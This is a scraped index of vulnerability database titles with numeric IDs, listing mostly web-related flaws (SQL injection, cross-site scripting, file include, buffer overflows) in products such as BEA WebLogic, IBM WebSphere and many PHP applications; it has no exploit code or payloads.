DataForm.pm security bypass [34296] Caucho Resin WEB-INF directory traversal [34295] Webdesproxy webdesproxy.c buffer overflow [34291] BEA Weblogic Server and WebLogic Express LDAP brute force [34290] BEA WebLogic Enterprise and Tuxedo information disclosure [34289] BEA WebLogic Server and WebLogic Express Administration Console insecure permissions [34288] BEA Weblogic Server and WebLogic Express configToScript information disclosure [34287] BEA WebLogic Server JMS Message Bridge security bypass [34286] BEA WebLogic Server and WebLogic Express configuration information disclosure [34285] BEA WebLogic Portal entitlement weak security [34284] BEA WebLogic Server JMS security bypass [34283] BEA WebLogic Portal GroupSpace cross-site scripting [34282] BEA WebLogic Server and WebLogic Express HttpProxyServlet and HttpClusterServlet unauthorized access [34281] BEA WebLogic Workshop and WebLogic Integration Test View Console directory traversal [34278] BEA WebLogic Server and WebLogic Express SSL port denial of service [34266] CommuniGate Pro Web mail cross-site scripting [34117] Progress Webspeed Messenger WService information disclosure [34105] Mini Web Shop sendmail.php and order_form.php cross-site scripting [34057] Progress Webspeed _edit.r denial of service [33991] Progress Webspeed Messenger webutil/_cpyfile.p information disclosure [33984] Sun Java Web Start system classes privilege escalation [33967] Pi3Web HTTP Server HTTP request denial of service [33949] IBM Websphere Application Server Security component unspecified [33903] NaviCOPA Web Server HTTP GET requests denial of service [33886] Asterisk Management Interface denial of service [33884] B2 Weblog and News Publishing Tool b2inc parameter file include [33860] AWBS (Advanced Webhost Billing System) cart2.php file include [33840] ACVSWebServices for PHP5 Transport.php file include [33818] Ripe Website Manager index.php SQL injection [33817] Ripe Website Manager index.php cross-site scripting [33804] uPHP ring website php script ring parameter SQL injection [33803] Apple Mac OS X WebFoundation information disclosure [33801] Apple Mac OS X WebDAV filesystem privilege escalation [33793] WEBinsta FM Manager login.php file include [33783] EBA-News webpages.php file include [33763] web-app.org WebAPP and web-app.net WebAPP Network Edition search.pl information disclosure [33762] web-app.org WebAPP and web-app.net WebAPP Network Edition search.pl cross-site scripting [33754] web-app.org WebAPP and web-app.net WebAPP Network Edition cgi-lib/subs.pl information disclosure [33744] Novell Groupwise WebAccess GWINTER.exe buffer overflow [33735] web-app.org WebAPP viewnews cross-site scripting [33734] rdiffWeb rdw_helpers.py directory traversal [33731] Sun Java Web Console libc syslog format string [33722] PHP-Nuke Web_Links, News, and Download module SQL injection [33718] my little weblog id parameter cross-site scripting [33711] Daniel Naber LanguageTool Web server error message cross-site scripting [33709] IBM Lotus Domino Web Access (DWA) Active Content Filter Content-Type header cross-site scripting [33708] Maian Weblog path_to_folder file include [33689] Web Slider path parameter file include [33645] MailBee WebMail Pro check_login.asp cross-site scripting [33644] IBM WebSphere Application Server Java Message Service denial of service [33641] PHPWebNews m_txt cross-site scripting [33629] Microsoft Windows DNS Server RPC interface buffer overflow [33613] webMethods Glue Management Console resource directory traversal [33598] WebKalk2 engine.inc.php file include [33591] @Mail WebMail System atmail.php cross-site scripting [33586] Database Administration (dba) module for Drupal administrative and user interfaces cross-site scripting [33577] Mini Web Server (MiniWebsvr) unspecified directory traversal [33529] Portail Web PHP pageAll parameter file include [33517] Mozilla Firefox document.location interface spoofing [33499] webblizzard CMS PHPSESSID session hijacking [33498] webblizzard CMS index_cms.php cross-site scripting [33475] webSPELL picture.php directory traversal [33472] Symantec Enterprise Security Manager (ESM) upgrade interface code execution [33471] IBM WebSphere Application Server Servlet Engine information disclosure [33388] Advanced Website Creator (AWC) mysql_escape_string SQL injection [33351] Company WebSite Builder Pro INCLUDE_PATH file include [33296] NaviCOPA Web Server cgi buffer overflow [33291] Data Domain administration interface command execution [33281] Web Content System formjavascript.php file include [33280] IBM Lotus Domino Web Access Active Content Filter cross-site scripting [33244] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) information disclosure [33228] Horde Groupware Webmail Edition search.php and rule.php cross-site scripting [33222] Bernard JOLY BJ Webring formulaire.php cross-site scripting [33195] eWebquiz ewebquiz.asp SQL injection [33162] ClassWeb language.php and survey.php file include [33157] aspWebCalendar calendar.asp SQL Injection [33123] IBM WebSphere Application Server unspecified HTTP response splitting [33096] TYPOlight webCMS unspecified [33095] Web Wiz Forums pop_up_member_search.asp SQL injection [33058] Webmin and Usermin simplify_path function directory traversal [33035] Company WebSite Builder comanda.php file include [33034] ViperWeb Portal System index.php file include [33025] IBM WebSphere Application Server JSP WAR and Extended Document Root source disclosure [33022] Web-APP.org WebAPP cookie security bypass [33016] Sun Java System Web Server URL information disclosure [33008] WebCalendar multiple scripts file include [33002] Sun Java System Web Server revoked certificate security bypass [32998] Sascha Schroeder WebLog index.php directory traversal [32973] Apple Mac OS X HID interface privilege escalation [32972] WebCreator load.inc.php file include [32877] WEBO foldertree.php file include [32870] web-app.org WebAPP and web-app.net WebAPP Network Edition admin feature cross-site scripting [32865] web-app.org WebAPP and web-app.net WebAPP Network Edition Search form unspecified [32864] web-app.org WebAPP Forum Archive feature and recent searches information disclosure [32863] web-app.org WebAPP censor unspecified [32862] web-app.org WebAPP hidden inputs unspecified [32861] Novell NetMail webadmin.exe buffer overflow [32859] web-app.org WebAPP CAPTCHA setting weak security [32856] web-app.org WebAPP and web-app.net WebAPP Network Edition Real Name unspecified [32855] web-app.org WebAPP and web-app.net WebAPP Network Edition guest profile unspecified [32854] web-app.org WebAPP Edit Profile forms unspecified [32853] web-app.org WebAPP cross-site request forgery unspecified [32851] web-app.org WebAPP and web-app.net WebAPP Network Edition email addresses unspecified [32850] web-app.org WebAPP and web-app.net WebAPP Network Edition Calendar Administration unspecified [32847] web-app.org WebAPP and web-app.net WebAPP Network Edition multiple vectors cross-site scripting [32840] EmbeddedWB Web Browser ActiveX control unspecified code execution [32832] WebCalendar noSet variable overwrite [32806] webSPELL members.php SQL injection [32805] webSPELL files.php file upload [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow [32790] webSPELL multiple SQL injection [32770] aWebNews path_to_news parameter file include [32759] DivX Web Player DivXBrowserPlugin ActiveX control denial of service [32755] WebMod Content-Length buffer overflow [32726] Nullsoft SHOUTcast administrative interface cross-site scripting [32725] Webmin and Usermin chooser.cgi cross-site scripting [32723] Mozilla Firefox and SeaMonkey user interface spoofing [32722] Multiple Web browser default charset cross-site scripting [32687] PhpWebGallery register.php and search.php cross-site scripting [32684] web-app.org WebAPP and web-app.net WebAPP Network Edition QUERY_STRING file overwrite [32679] WebMplayer index.php command execution [32678] Macrovision FLEXnet Connect Update Service Web Agent ActiveX control download method buffer overflow [32676] WebMplayer index.php and filecheck.php SQL injection [32670] webSPELL add squad feature file upload [32669] webSPELL login SQL injection [32646] J-Web Pics Navigator dir parameter directory traversal [32645] Macrovision InstallFromTheWeb ActiveX buffer overflow [32641] PHP Web application file include [32599] webSPELL printview.php SQL injection [32596] JBoss Application Server admin interface unauthorized access [32595] IBM Lotus Domino Webmail names.nsf information disclosure [32563] ezBOO WebStats update.php unauthorized access [32554] webSPELL showonly parameter SQL injection [32549] Trend Micro OfficeScan Web deployment SetupINICtrl ActiveX control buffer overflow [32545] MiniWebsvr prn.htm file denial of service [32526] web-app.org WebAPP and web-app.net WebAPP Network Edition Gallery Comments and Feedback cross-site scripting [32506] web-app.org WebAPP and web-app.net WebAPP Network Edition Profile Edit feature cross-site scripting [32499] web-app.org WebAPP and web-app.net WebAPP Network Edition Search Results pages cross-site scripting [32498] web-app.org WebAPP and web-app.net WebAPP Network Edition Statistics Log viewer cross-site scripting [32492] WebTester POST parameters cross-site scripting [32490] WebTester directions.php SQL injection [32483] @Mail WebMail System search.pl cross-site scripting [32467] Plain Old Webserver (POW) HTTP request directory traversal [32459] Aruba Mobility Controller management interface buffer overflow [32451] Mini Web Server (MiniWebsvr) directory traversal [32400] cPanel and WebHost Manager (WHM) Module scripts2/objcache cross-site scripting [32318] Webmatic index_album.php file include [32316] IBM WebSphere Application Server UserNameToken cache unspecified [32295] IBM WebSphere Application Server unspecified JSP source disclosure [32146] HTTP WebDAV PROPFIND component enabled [32121] Portail Web Php includes.php file include [32115] Portail Web Php index.php file include [32098] SpoonLabs Vivvo Article Management CMS show_webfeed.php SQL injection [32093] Web server directories readable [32091] Web server script directory readable [32072] WebBuilder StageLoader.php file include [32045] Firewall trusted interface [32039] Web server SSL version detected [32036] Web server version detected [32005] Cadre PHP Web Framework class.Quick_Config_Browser.php file include [31960] Hitachi Web Server (HWS) and multiple uCosminexus and Cosminexus Expect header cross-site scripting [31959] Hitachi Web Server (HWS) and multiple uCosminexus and Cosminexus image map cross-site scripting [31946] Hitachi Web Server (HWS) and multiple uCosminexus and Cosminexus SSL weak security [31905] WebGUI www_purgeList() security bypass [31881] Webfwlog debug.php file include [31868] OpenEMR interface/globals.php variable overwrite [31826] CGI Rescue WebFORM unspecified cross-site scripting [31752] Symantec Web Security (SWS) license registering denial of service [31750] Symantec Web Security (SWS) HTML tags cross-site scripting [31732] FreeWebshop.org login.php file include [31695] Weblinks component for Joomla! category.php SQL injection [31692] Website Baker class.login.php SQL injection [31686] Web server URL encoding [31685] IntraWeb Component of AToZed Software denial of service [31678] Apple Mac OS X Webkit Webcore denial of service [31664] Mini Web Server (MiniWebsvr) multiple buffer overflows [31662] PHP Link Directory admin interface cross-site scripting [31653] FreeWebshop.org index.php path disclosure [31644] Microsoft IIS Web server access.cnf file detected [31642] Microsoft IIS Web server service.cnf file detected [31638] Microsoft IIS Web server svcacl.cnf file detected [31632] webSPELL gallery.php SQL injection [31631] Neon Labs Website lib/nl/nl.php file include [31624] WebChat defines.php file include [31603] BEA WebLogic Server and WebLogic Express proxy plug-in for Netscape Enterprise Server denial of service [31602] BEA WebLogic Portal cluster weak security [31596] BEA WebLogic Server, WebLogic Express, WebLogic Platform, and BEA JRockit return address buffer overflow [31590] BEA WebLogic Portal entitlement weak security [31588] BEA WebLogic Server and WebLogic Express on Solaris 9 socket denial of service [31587] BEA WebLogic Server admin server weak security [31586] BEA WebLogic Server and WebLogic Express malformed header denial of service [31585] BEA WebLogic Server and WebLogic Express HTTP request information disclosure [31579] BEA WebLogic Server and WebLogic Express EJB security bypass [31578] BEA WebLogic Server and WebLogic Express EJB privilege escalation [31577] BEA WebLogic Server and WebLogic Express WSEE runtime security bypass [31576] BEA WebLogic Server and WebLogic Express jar update privilege escalation [31574] BEA WebLogic Server and WebLogic Express web.xml denial of service [31573] WebGUI username parameter cross-site scripting [31571] BEA WebLogic Server and WebLogic Express config.xml weak security [31569] BEA WebLogic Server and WebLogic Express .ear information disclosure [31563] BEA WebLogic Server and WebLogic Express WS-Security man-in-the-middle [31561] BEA WebLogic Server T3 denial of service [31560] BEA WebLogic Server JDBCDataSourceFactory plaintext password [31559] BEA WebLogic Server certificate security bypass [31558] BEA WebLogic Server SSL man-in-the-middle [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service [31545] IBM WebSphere Application Server trace information disclosure [31544] IBM WebSphere Application Server JSP code source disclosure [31542] IBM WebSphere Application Server unspecified information disclosure [31514] iPlanet Web Server NS-max-records parameter cross-site scripting [31510] Okul Web Otomasyon Sistemi etkinlikbak.asp SQL injection [31501] FdWeB Espace Membre _admin/admin_menu.php file include [31498] WebGUI unspecified cross-site scripting [31458] BlueZ Human Interface Device (HID) unauthorized access [31382] Direct Web Remoting (DWR) servlet engine denial of service [31377] Direct Web Remoting (DWR) include/exclude security bypass [31360] MOTIONBORG Web Real Estate admin_check_user.asp SQL injection [31347] Magic Photo Storage Website config parameter file include [31338] Webulas Uyelik db.mdb information disclosure [31324] OmniWeb JavaScript alert() function format string [31261] Simple Web Content Management System page.php SQL injection [31260] @Mail WebMail System Webadmin cross-site scripting [31259] @Mail WebMail System unspecified cross-site request forgery [31173] WebText CMS profile name code execution [31161] Durian Web Application Server request handling buffer overflow [31153] AIDeX Mini-WebServer HTTP request denial of service [31123] ScriptFrenzy.com Host Directory Pro and Alstrasoft Web Host Directory admin security bypass [31122] ScriptFrenzy.com Host Directory Pro and Alstrasoft Web Host Directory database information disclosure [31111] Application RPC interface buffer overflow [31108] ScriptFrenzy.com Host Directory Pro and Alstrasoft Web Host Directory unspecified path disclosure [31078] Enthrallweb eCars types.asp SQL injection [31077] Enthrallweb eJobs newsdetail.asp SQL injection [31076] Enthrallweb eMates newsdetail.asp SQL injection [31073] Enthrallweb ePages actualpic.asp SQL injection [31072] Enthrallweb eClassifieds myprofile.asp security bypass [31068] Enthrallweb eCoupons myprofile.asp security bypass [31065] Enthrallweb eNews myprofile.asp security bypass [31052] WeBWorK Program Generation Language macro security bypass [31049] web-app.net WebAPP Network Edition unspecified security bypass [31048] web-app.org WebAPP and web-app.net WebAPP Network Edition unspecified cross-site scripting [31025] @Mail WebMail System filter evasion cross-site scripting [31012] Serendipity PHP Weblog System Entry Manager module cross-site request forgery [30998] Novell NetWare Welcome web-app cross-site scripting [30977] Mini Web Shop viewcategory.php path disclosure [30976] Mini Web Shop viewcategory.php cross-site scripting [30954] WebCalendar export_handler.php cross-site scripting [30945] IBM WebSphere Application Server Servlet Engine/Web Container information disclosure [30943] IBM WebSphere Application Server General component unspecified [30915] mxBB Web Links Module lang_admin.php file include [30903] IBM WebSphere Application Server Utility Classes unspecified [30846] Skulls! Multi-Network WebCache multiple unspecified [30826] IBM WebSphere Host On-Demand (HOD) pnl parameter authentication bypass [30823] Barman interface.php file include [30792] WebHost Manager (WHM) multiple scripts cross-site scripting [30693] SquirrelMail webmail.php and compose.php cross-site scripting [30686] IBM Websphere EAL4 authentication unspecified [30684] IBM WebSphere Application Server unspecified [30674] Xerox WorkCentre WebUI code execution [30662] Sun Java System Application and System Web Server proxy cross-site request forgery [30645] Apple Mac OS X WebKit code execution [30538] REMLAB Web Mech Designer calculate.php path disclosure [30528] Wallpaper Website wallpaper.php SQL injection [30509] Recipes Complete Website list.php SQL injection [30507] WebHost Manager (WHM) multiple scripts cross-site scripting [30434] my little weblog weblog.php cross-site scripting [30401] phpWebThings core/editor.php file include [30396] BestWebApp Dating Site login_form.asp cross-site scripting [30394] BestWebApp Dating Site Login SQL injection [30371] DEV web management system configuration parameter file include [30309] Helm WebHosting Control Panel domains.asp, users.asp and default.asp cross-site scripting [30308] Kerio WebSTAR privilege escalation [30261] WWWeb Concepts prodtype.asp and product.asp SQL injection [30240] Web based bibliography management system (Aigaion) DIR file include [30126] FreeWebshop index.php cross-site scripting [30125] FreeWebshop page directory traversal [30075] Easy Chat Server Web root information disclosure [30055] IBM WebSphere Application Server FAULTACTOR cross-site scripting [30049] Essentia Web Server HTTP GET request buffer overflow [30020] Webdrivers Simple Forum message_details.php SQL injection [30009] Web Directory Pro backup_db.php and options.php security bypass [29997] BlooMooWeb ActiveX control BW_DeleteTempFile() denial of service [29991] FreeWebshop.org index.php directory traversal [29990] FreeWebshop.org logging in SQL injection [29982] SAP Web Application Server named pipe privilege escalation [29981] SAP Web Application Server enserver.exe denial of service [29980] SAP Web Application Server unspecified file disclosure [29976] Easy Address Book Web Server NTFS information disclosure [29968] BlooMooWeb ActiveX insecure methods command execution [29930] Daronet Internet Solutions website platform ViewImage.asp cross-site scripting [29928] Mirapoint Web Mail expression() cross-site scripting [29925] Easy File Sharing Web Server NTFS information disclosure [29923] Easy File Sharing Web Server forum thread cross-site scripting [29905] Business Card Web Builder (BCWB) root_path_admin file include [29898] WebWizForum search.asp SQL injection [29885] Soft3304 04WebServer URL string processing information disclosure [29880] WWWeBBB Forum page.cgi directory traversal [29861] Simple Website Software (SWS) common.php file include [29826] MiniHTTP Web Forum &amp [29820] D-Link webcm cross-site scripting [29818] D-Link webcm directory traversal [29815] INCA IM-204 webcm directory traversal [29806] Sun Java System and iPlanet Messaging Servers Webmail module cross-site scripting [29721] MDweb132 chemin_appli file include [29717] Highwall Enterprise and Highwall Endpoint management interface cross-site scripting [29716] Highwall Enterprise and Highwall Endpoint management interface multiple SQL injection [29715] Trawler Web CMS path-red2 file include [29712] Web Group Communication Center (WGCC) quiz.php SQL injection [29659] DEV Web management system index.php cross-site scripting [29653] Webmedia Explorer core.lib.php file include [29642] IBM WebSphere WSN authentication bypass [29641] IBM WebSphere unspecified security exposure [29591] PHP Top webs config.php file include [29563] WebSPELL index.php SQL injection [29553] NuralStorm Webmail process.php file include [29446] Asbru Web Content Management Aspell command execution [29397] WebYep webyep_sIncludePath parameter file include [29338] TeraStation administration interface cross-site request forgery [29296] Apple Mac OS X and Mac OS X Server WebObjects incorrect privilege dropping [29288] VAMP Webmail setup/yesno.phtml file include [29285] phpMyWebmin target parameter file include [29259] phpMyWebmin window.php or home.php information disclosure [29258] phpMyWebmin window.php or home.php file include [29223] PHPSelect Web Development Division index.php3 file include [29167] WEB//NEWS parser.php file include [29119] Web-News template.php file include [29103] xweblog kategori.asp SQL injection [29091] Neon WebMail for Java username cross-site scripting [29090] Neon WebMail for Java multiple directory traversal [29089] Neon WebMail for Java updateuser security bypass [29088] Neon WebMail for Java addrlist and maillist SQL injection [29087] Neon WebMail for Java updatemail insecure data [29086] Neon WebMail for Java JSP file upload [29069] Dr. Web LHA archive buffer overflow [29039] Business Card Web Builder (BCWB) startup.inc.php file include [29037] DigitalWebShop _PHPLIB[libdir] parameter file include [28984] Roller Weblogger multiple fields cross-site scripting [28898] webSPELL squads.php SQL injection [28896] webSPELL src/login.php authentication bypass [28851] MyABraCaDaWeb index.php and pop.php file include [28815] Web Server Creator customize.php and index.php file include [28776] WebAdmin MDaemon privilege escalation [28759] Web Dictate admin unauthorized access [28752] Easy Address Book Web Server URL format string [28701] Webmin and Usermin unspecified cross-site scripting [28699] Webmin and Usermin source code disclosure [28665] iWebNegar comments.php SQL injection [28663] iWebNegar comments.php cross-site scripting [28636] SAP-DB and MaxDB WebDBM HTTP request buffer overflow [28621] Sun Java Plug-in and Java Web Start JRE security bypass [28618] Web3news include/_class.security.php file include [28607] IBM WebSphere Application Server ThreadIdentitySupport unspecified vulnerabilities [28603] IBM WebSphere Application Server unspecified information disclosure [28590] CliServ Web Community cl_headers file include [28579] IBM WebSphere Application Server unspecified information disclosure [28577] IBM WebSphere Application Server multiple unspecified vulnerabilities [28557] WEBinsta CMS modules/usersonline/users.php file include [28489] WebAdmin userlist.wdm privilege escalation [28488] WebAdmin logfile_view.wdm and configfile_view.wdm directory traversal [28426] WebTorrent (Wtcom) torrents.php SQL injection [28371] WEBinsta CMS index.php file include [28355] 04WebServer user identification bypass [28354] 04WebServer error page cross-site scripting [28350] Webring component for Joomla! admin.webring.docs.php file include [28340] WEBinsta mailing list manager install3.php file include [28336] Symantec VERITAS Backup Exec for Windows Server RPC interface buffer overflow [28320] Hitweb genpage-cgi.php file include [28317] TinyWebGallery image.php file include [28314] SaveWeb Portal index.php file include [28292] Comet WebFileManager (Cwfm) checkupload.php file include [28287] Archangel Weblog name and comment field cross-site scripting [28249] SQLiteWebAdmin tpl.inc.php directory file include [28230] Computer Associates (CA) eTrust AntiVirus WebScan ActiveX improper timestamp verification [28229] Computer Associates (CA) eTrust Antivirus WebScan ActiveX filelist.txt buffer overflow [28226] Computer Associates (CA) eTrust AntiVirus WebScan ActiveX Automatic Update code execution [28211] Novell GroupWise WebAccess UTF-7 encoding cross-site scripting [28210] Novell GroupWise WebAccess cross-site scripting [28182] SaveWeb Portal SITE_Path file include [28149] Apple Mac OS X WebKit deallocated object code execution [28069] AWBS (Advanced Webhost Billing System) contact.php cross-site scripting [27949] EVA-Web perso and aide parameters path disclosure [27804] Microsoft Internet Explorer WebViewFolderIcon ActiveX object code execution [27797] WebScarab URI cross-site scripting [27786] WebEx ActiveX control multiple buffer overflows [27780] Visnetic Mail Server, Merak Mail Server and IceWarp Web Mail &quot [27773] Visnetic Mail Server, Merak Mail Server and IceWarp Web Mail /accounts/inc/include.php and /admin/inc/include.php file include [27685] Drupal webform module unspecified cross-site scripting [27655] FlexWATCH unspecified Web server cross-site scripting [27643] MIMEsweeper for Web RAR archive Web Policy Engine denial of service [27637] Webvizyon Portal SayfalaAltList.asp SQL injection [27586] BEA WebLogic Server or BEA WebLogic Express is running [27526] PhpWebGallery comments.php cross-site scripting [27442] Cisco Wireless Control System (WCS) HTTP interface information disclosure [27441] Cisco Wireless Control System (WCS) HTTP interface cross-site scripting [27437] Cisco Access Point Web browser unauthorized administrative access [27389] WeBBoA Hosting host/yeni_host.asp SQL injection [27371] UebiMiau Webmail multiple scripts cross-site scripting [27366] Webmin backslash directory traversal [27309] Open WebMail openwebmail-main.pl cross-site scripting [27288] Microsoft Internet Explorer ASCII encoded Web filter bypass [27272] Webroot Spy Sweeper filename security bypass [27268] Webroot Spy Sweeper Spy Communication Shield Web filter security bypass [27266] Webroot Spy Sweeper archive Compression Sweep bypass [27264] Webroot Spy Sweeper Startup-Shield security bypass [27130] FORM2MAIL and WebFORM email header injection [27086] Cisco VPN 3000 and Cisco ASA 5500 WebVPN cross-site scripting [27061] aWebNews visview.php file include [27039] WebprojectDB nav.php and lang.php file include [27007] aWebNews login.php information disclosure [26975] WeBWork PG Problem Editor security bypass [26939] TIBCO Rendezvous daemon HTTP administrative interface buffer overflow [26938] TIBCO Hawk Monitoring Agent configuration interface buffer overflow [26937] aspWebLinks links.asp SQL injection [26928] Weblog Oggi comment cross-site scripting [26910] WebspotBlogging &quot [26891] EVA-Web article-album.php3 and rubrique.php3 cross-site scripting [26885] My Web Server HTTP request denial of service [26878] VMware ESX Server management interface cross-site scripting [26856] F@cile Interactive Web index.php information disclosure [26854] F@cile Interactive Web themes file include [26841] F@cile Interactive Web p-editpage.php and p-editbox.php file include [26839] F@cile Interactive Web p-popupgallery.php file include [26799] Multiple F-Secure products Web Console HTTP request buffer overflow [26748] WebCalendar includes/config.php information disclosure [26706] Symantec AntiVirus and Client Security remote management interface buffer overflow [26694] V-Webmail core.php file include [26680] IceWarp Web Mail PHPSESSID cross-site scripting [26666] HyperStop Web Host Directory &quot [26665] AlstraSoft Web Host Directory &quot [26661] HyperStop Web Host Directory multiple path disclosure [26658] HyperStop Web Host Directory search/index.php SQL injection [26656] AlstraSoft Web Host Directory multiple scripts path disclosure [26653] AlstraSoft Web Host Directory search/index.php SQL injection [26634] Apple Xcode Tools WebObjects plug-in unauthorized access [26622] Multiple MyWeb products SQL injection [26608] PunkBuster WebTool component buffer overflow [26605] Destiney Rated Images Script addweblog.php and leaveComments.php cross-site scripting [26566] IBM WebSphere Application Server FFDC logs plaintext LDAP passwords [26565] IBM WebSphere Application Server embedded script tag script execution [26564] IBM WebSphere Common Configuration Mode trace information disclosure [26563] IBM WebSphere Application Server administrative console unauthorized access [26562] IBM WebSphere Application Server unauthorized EJB access on Solaris [26560] IBM WebSphere Application Server addNode.log plaintext account credentials [26559] IBM WebSphere HTTP request handlers information disclosure [26544] Bitrix CMS administration interface cross-site scripting [26522] Spymac WebOS index.php, get_ipod.php and login.php cross-site scripting [26478] Caucho Resin Web server URL encoded backslash directory traversal [26468] BEA WebLogic Server domain name disclosure [26467] BEA WebLogic Server stopWeblogic.sh password disclosure [26466] BEA WebLogic Server private key disclosure [26465] BEA WebLogic Server internal network information disclosure [26464] BEA WebLogic Server Administration Console insecure custom JDBC policies [26463] BEA WebLogic Server failed login cleartext password log [26462] BEA WebLogic Server Administration Console IP disclosure [26461] BEA WebLogic Server JSP error source code disclosure [26460] BEA WebLogic Server admin password reset cleartext [26459] BEA WebLogic Server Quality of Service insecure transaction channel [26458] BEA WebLogic Server JTA transactions information disclosure [26421] Web-Labs CMS search and alerts cross-site scripting [26345] openEngine website.php file include [26338] 3Com TippingPoint SMS Server management interface information disclosure [26326] Website Baker user display name field cross-site scripting [26312] IBM WebSphere welcome page authentication bypass [26308] Cisco PIX/ASA/FWSM using WebSense/N2H2 content filtering bypass [26294] Xeneo Web Server script source disclosure [26284] OpenVPN remote management interface no authentication [26277] PhpWebGallery search.php cross-site scripting [26262] WebCalendar includes/user.php information disclosure [26260] Web4Future News Portal comentarii.php and view.php SQL injection [26259] Web4Future News Portal comentarii.php and view.php cross-site scripting [26246] Big Webmaster Guestbook comment fields cross-site scripting [26198] Blog Mod weblog_posting.php SQL injection [26196] WEBInsta Limbo sql.php file include [26159] SWS Web Server sws_web_server.c and ayardosyasi.h buffer overflow [26158] SWS Web Server sws_web_server.c and ayardosyasi.h format string [26151] Network Administration Visualized report interface SQL injection [26105] Open WebMail multiple openwebmail scripts cross-site scripting [26079] PhpWebGallery picture.php security bypass [26067] phpWebFTP index.php cross-site scripting [25980] Websense &quot [25921] phpWebFTP script.js information disclosure [25920] phpWebFTP index.php directory traversal [25867] phpWebSite index.php hub_dir file include [25831] TinyWebGallery index.php cross-site scripting [25802] TalentSoft Web+Shop webplus.exe path disclosure [25800] Aweb Script Seller payment security bypass [25799] phpWebSite topics.php SQL injection [25782] Aweb`s Banner Generator index.php cross-site scripting [25733] PHPWebGallery category.php and picture.php cross-site scripting [25732] APT-WEBSHOP-SYSTEM modules.php path disclosure [25731] APT-WEBSHOP-SYSTEM modules.php SQL injection [25721] TalentSoft Web+Shop deptname parameter cross-site scripting [25698] Cherokee Web Server handler_error.c cross-site scripting [25621] McAfee WebShield SMTP server format string [25619] IBM WebSphere HTTP header denial of service [25590] aWebNews login.php, fpass.php and visview.php SQL injection [25589] aWebNews visview.php cross-site scripting [25587] aWebBB multiple scripts SQL injection [25586] aWebBB BBCode cross-site scripting [25585] aWebBB multiple scripts cross-site scripting [25574] Hitachi Groupmax World Wide Web cross-site scripting [25550] Microsoft Exchange Outlook Web Access cross-site scripting [25539] WebCalendar multiple .php scripts path disclosure [25474] Connect Daily Web Calendar multiple cross-site scripting [25443] WEBalbum skin2 parameter file include [25435] web-app.org WebAPP index.cgi cross-site scripting [25431] Web Quiz Pro prequiz.asp and student.asp cross-site scripting [25428] webcheck content cross-site scripting [25418] Quick 'n Easy Web Server ASP source code disclosure [25417] Baby Web Server ASP source code disclosure [25390] RSA SecurID IISWebAgentIF.dll buffer overflow [25375] 1WebCalendar multiple scripts path disclosure [25373] 1WebCalendar multiple scripts SQL injection [25348] BEA WebLogic Server and Express XML parser denial of service [25347] BEA WebLogic Server default servlet unauthorized system access [25345] BEA WebLogic Portal JSR-168 Portlet disclosure [25328] phpWebSite friend.php and article.php SQL injection [25315] MailEnable webmail component denial of service [25295] Maian Weblog print.php and mail.php SQL injection [25175] Xerox CopyCentre and WorkCentre Pro Web server memory corruption denial of service [25142] Archangel Weblog index.php file include [25136] Easy File Sharing Web Server description cross-site scripting [25135] Easy File Sharing Web Server logging denial of service [25031] Apple Mac OS X WebKit buffer overflow [25030] Joomla! admin interface SQL injection [25003] SAP Web Application Server HTTP response injection information disclosure [24984] Archangel Weblog admin cookie authentication bypass [24979] NetworkActiv Web Server .php script source code disclosure [24973] IBM WebSphere Application Server JSP source disclosure [24944] Website Generator process3.php file include [24931] MUTE P2P mWebCache security bypass [24903] WebDrive name field buffer overflow [24877] WEBInsta Limbo Contact Form cross-site scripting [24875] DEV Web management system City/Region cross-site scripting [24860] RoundCube Webmail _task parameter error message path disclosure [24847] SquirrelMail webmail.php cross-site scripting [24839] cPanel dowebmailforward.cgi cross-site scripting [24824] Scientific Atlanta WebSTAR DPX2100 LanD packet denial of service [24762] D-Link DWL-G700AP administrative interface denial of service [24758] Leif M. Wright`s Web Blog headers cross-site scripting [24757] Leif M. Wright`s Web Blog sendmail command execution [24755] Leif M. Wright`s Web Blog blog.cgi authentication bypass [24754] V-webmail help.php path disclosure [24753] V-webmail frameset.php spoofing [24752] Leif M. Wright`s Web Blog .txt obtain information [24751] SAP Business Connector administrative interface spoofing [24749] V-webmail preferences.personal.php cross-site scripting [24736] WordPress author website field cross-site scripting [24729] Web Calendar Pro dropbase.php SQL injection [24708] webSPELL search.php SQL injection [24695] WebGUI &quot [24693] noweb lib/toascii.nw and shell/roff.mm symlink [24692] PerlBlog weblog.pl command execution [24691] PerlBlog weblog.pl cross-site scripting [24690] PerlBlog weblog.pl directory traversal [24657] Hasbani Web Server GET denial of service [24626] Fortinet FortiGate Web filter URL bypass [24614] IBM Lotus Domino Web Access attachment file name cross-site scripting [24613] IBM Lotus Domino Web Access javascript: URL cross-site scripting [24612] IBM Lotus Domino Web Access &quot [24611] IBM Lotus Domino Web Access .html attachment cross-site scripting [24609] e/pop WebConference Server topic cross-site scripting [24595] IBM WebSphere tracing for session manager information disclosure [24568] Sun Java Web Start JNLP privilege elevation [24517] MailEnable Enterprise webmail denial of service [24491] Microsoft Windows MSRPC WebClient service message buffer overflow [24462] 4D WebSTAR Mailbox Server denial of service [24433] Multiple Mozilla products QueryInterface memory corruption [24432] Multiple Web browser long title history.dat denial of service [24370] WebEx ActiveX control DLL code execution [24355] Phpclanwebsite index.php SQL injection [24322] WeBWork privileged user command execution [24317] Kerio WinRoute firewall Web browsing denial of service [24316] Ensim WEBppliance ocw_login_username cross-site scripting [24304] Virata-EmWeb unauthorized DSL modem access [24302] BEA WebLogic Server and Express SSL identity exposure [24301] BEA WebLogic Server and Express connection filter denial of service [24299] BEA WebLogic Server JDNI security policy weakness [24298] BEA WebLogic Server security provider weakness [24297] BEA WebLogic Portal deployment descriptor information disclosure [24295] BEA WebLogic Server and Express log file information disclosure [24294] BEA WebLogic Server and Express Java MBean unauthorized access [24293] BEA Weblogic Portal WSRP unauthorized access [24291] BEA WebLogic application code information disclosure [24290] BEA WebLogic Server and Express password information disclosure [24286] BEA WebLogic Server unauthorized cross domain management [24284] BEA WebLogic Portal config.xml information disclosure [24231] Phpclanwebsite IMG BBcode tag cross-site scripting [24222] WebspotBlogging login.php SQL injection [24211] IBM Lotus Domino Web module unspecified cross-site scripting [24176] Cisco IOS HTTP management interface CDP status page cross-site scripting [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting [24100] IronWall webserver default file access [24097] Orjinweb E-commerce URL file include [24079] Orion Web Server 404 error cross-site scripting [24053] WebGUI forms module cross-site scripting 